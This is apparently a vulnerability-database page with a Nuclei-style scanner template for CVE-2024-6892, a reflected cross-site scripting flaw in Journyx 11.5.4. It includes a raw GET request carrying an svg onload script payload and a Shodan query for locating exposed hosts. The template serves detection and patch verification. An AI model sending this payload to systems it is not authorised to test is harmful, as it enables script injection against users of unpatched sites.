漏洞描述
Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
CVE-2024-6892: Journyx 11.5.4 - Reflected Cross Site Scripting
PoC代码[已公开]
id: CVE-2024-6892
info:
name: Journyx 11.5.4 - Reflected Cross Site Scripting
author: DhiyaneshDk
severity: medium
description: |
Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.
reference:
- https://korelogic.com/Resources/Advisories/KL-001-2024-009.txt
- http://seclists.org/fulldisclosure/2024/Aug/7
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-6892
cwe-id: CWE-81,CWE-79
epss-score: 0.02827
epss-percentile: 0.85668
cpe: cpe:2.3:a:journyx:journyx:11.5.4:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: journyx
product: journyx
shodan-query: html:"Journyx"
tags: cve,cve2024,xss,journyx,seclists,vuln
http:
- raw:
- |
GET /jtcgi/r/adlogin/sso?code=1337&state=foobar&id_token=zoinks&error_description=%3Csvg%2fonload%3dprompt(%27document.domain%27)%3E&error=error HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<P>error <B><svg/onload=prompt('document.domain')></B></P>"
- "journyx"
condition: and
case-insensitive: true
- type: word
part: content_type
words:
- "text/html"
# digest: 490a0046304402207cb8776a227be84abdbc159afceff745f836673b470fce7fcc256d071ffe78910220169cd50e3fed64fe187eae0d7405a2e13a1709a977f6ffbba23a7d88115af207:922c64590222798bb761d5b6d8e72950